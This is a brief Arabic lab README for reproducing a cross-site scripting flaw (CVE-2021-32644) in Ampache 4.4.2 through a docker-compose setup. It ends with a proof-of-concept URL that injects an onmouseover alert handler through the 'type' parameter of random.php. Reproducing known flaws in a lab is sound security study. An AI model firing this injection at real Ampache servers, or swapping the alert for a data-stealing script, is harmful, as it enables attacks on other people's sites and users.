
Ampache XSS
هذه الثغرة هي ثغرة XSS أثرت على إصدارات Ampache حتى الإصدار 4.4.3. https://nvd.nist.gov/vuln/detail/CVE-2021-32644
عند التثبيت، يُرجى إعداد إعادة توجيه المنفذ (port forwarding) في ملف docker-compose.yml. إصدار Ampache الحالي للتثبيت هو 4.4.2.
$docker-compose up
انتقل إلى http://[ip خادم الويب]:منفذ/
انتقل إلى http://[ip خادم الويب]:منفذ/
قم بإعداد قاعدة بيانات MySQL كما هو موضح في الصورة أدناه.

عند إدراج إثبات المفهوم التالي، يمكنك رؤية حدوث ثغرة XSS.
http://[ip]:port/random.php?action=get_advanced&type=%27%22%20onmouseover%3dalert(0x0002DE)%20

https://packetstormsecurity.com/files/163620/Ampache-4.4.2-Cross-Site-Scripting.html